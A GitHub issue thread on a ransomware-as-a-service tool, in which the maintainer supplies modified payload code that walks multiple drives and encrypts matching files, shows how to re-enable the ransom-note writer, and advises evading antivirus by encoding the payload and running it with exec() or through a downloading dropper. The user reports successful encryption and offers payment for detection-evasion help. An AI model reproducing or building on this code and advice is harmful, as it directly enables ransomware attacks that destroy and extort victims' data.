### ISSUE TITLE
why only disk c

### ISSUE THREAD

**Issue by testermerat** [leonv024/RAASNet#36]
hello software is working very well. but how can we include this in disk D :. I worked very hard but could not get any results. I will be happy if you answer

**Comment by leonv024** [comment]
I know it would improve the tool, but that would make this tool even more script kiddie friendly. I had to stop at some point.

Anyway,
Here's an example on how to add multiple drives. You'll need to modify `payload.py` befor compiling.

https://gist.github.com/leonv024/16b6d60b29c050108a35db6b1d7e93ff

I changed 2 areas of the payload.

Note this is a demo: if you paste this code in payload.py, it will only print out de found files, without encrypting them.

Add drive list:

```
def get_target():
    # Get user home:
    return ['C:/', 'E:/', 'F:/']
```

`...`

Set target dirs (somewhat default):

```
    ###################################
    # Target these folders in every drive.

    # Set: dirs = ['.'] to target every directory.
    # NOTE:
    # This will also encrypt ALL directories on C:/, such as Windows and System32, destorying Windows.
    # So, better not to target C:/.
    # This can be solved with an exception list or; if target endswith = '/./' and if target startswith 'C:/', ignore.
    ###################################

    dirs = ['Users',
'fotos',
'Hearthstone',
]
```

`...`

Add loop for dives:

```
    try:
        # for directory in list
        for x in dirs:
            # for drive in list
            for drive in p:        # <---- Added this loop to loop through the drives
                # Do: C:/Users/, E:/Users/ F:/Users/, exc...
                target = drive + x + '/'
                # Debug; show currect directory
                print('[SEARCHING] Targeting %s' % target)
                # For files in C:/Users/
                for path, subdirs, files in os.walk(target):
                    # for path in found files
                    for name in files:
                        # for extention in "ext" list
                        for i in ext:
                            # if filename ends with .txt, .exe, .jpg, exc...
                            if name.endswith(i.lower()):
                                # Debug; print filename
                                #print('[FOUND] %s' % name)
                                try:
                                    # Encrypt the file, for now, let's not :)
                                    #encrypt_file(os.path.join(path, name), key) # <-- Unhash this line to encrypt
                                    # Count
                                    c +=1
                                    #print('[ENCRYPTED] %s' % name) # Debug; If successful, print filename.
                                # Cache errors instead of exciting
                                except Exception as e:
                                    # Debug; If error, print error.
                                    print('[ERROR] %s' % e)
                                    pass
                '''
                try:
                    with open(path + '/README.txt', 'w') as f:
                        f.write(message)
                        f.close()
                except Exception as e:
                    print('[ERROR] %s' % e)
                    pass
                '''
```

**Comment by testermerat** [comment]
You can be sure about that. I will improve the tool. and thank you also for the code. I will try

**Comment by testermerat** [comment]
thanks leon the code i managed to script successfully. The payload is generating automatically. Thank you again and the encryption gave a successful result. But the fud part of the script is blown gets stuck with virus software. I will try to solve this too

**Comment by leonv024** [comment]
well done. sounds good.

**Comment by testermerat** [comment]
sorry for the inconvenience, but after trying to reset all disks the readme.txt file does not occur. But I tried too much. I tried using 2 different codes on the same page but readme.txt does not create file

**Comment by leonv024** [comment]
I know, that part was commented out because it was a test script.

```
                ''' # < --- Remove
                try:
                    with open(path + '/README.txt', 'w') as f:
                        f.write(message)
                        f.close()
                except Exception as e:
                    print('[ERROR] %s' % e)
                    pass
                ''' # <--- Remove
```

**Comment by testermerat** [comment]
I've already removed the comment line. it didn't work anyway.`gethome = str(path.home)+'/'
with open(gethome+'Desktop' + '/README.txt', 'w+') as f:
                        f.write(message)
                        f.close()`
I manually created one for desktop only. Every folder does not print when I try

**Comment by testermerat** [comment]
anyway i have a fud question about this topic. I even purchased fud at a premium but it is not compatible with scripts. I will be waiting for your paid free help on this subject. If you can give me a fud or help with this, I can help with money. Not compatible with any fuds in the cheese and it doesn't work when you fud

**Comment by leonv024** [comment]
I know.

Even if I would get it FUD again by some additional code, it would get detected within a matter of weeks, so I didn't bother to much.

I first tried it the easy way. When I encoded the payload (Marshall, Base64, you name it) and than used exec() to execute the code, it was FUD. But I didn't upload it because it would get detected again.

I instructed others to do the same but I wouldn't know the result now.

Using a dropper remains the best way. Some pre code that downloads the payload and executes it.
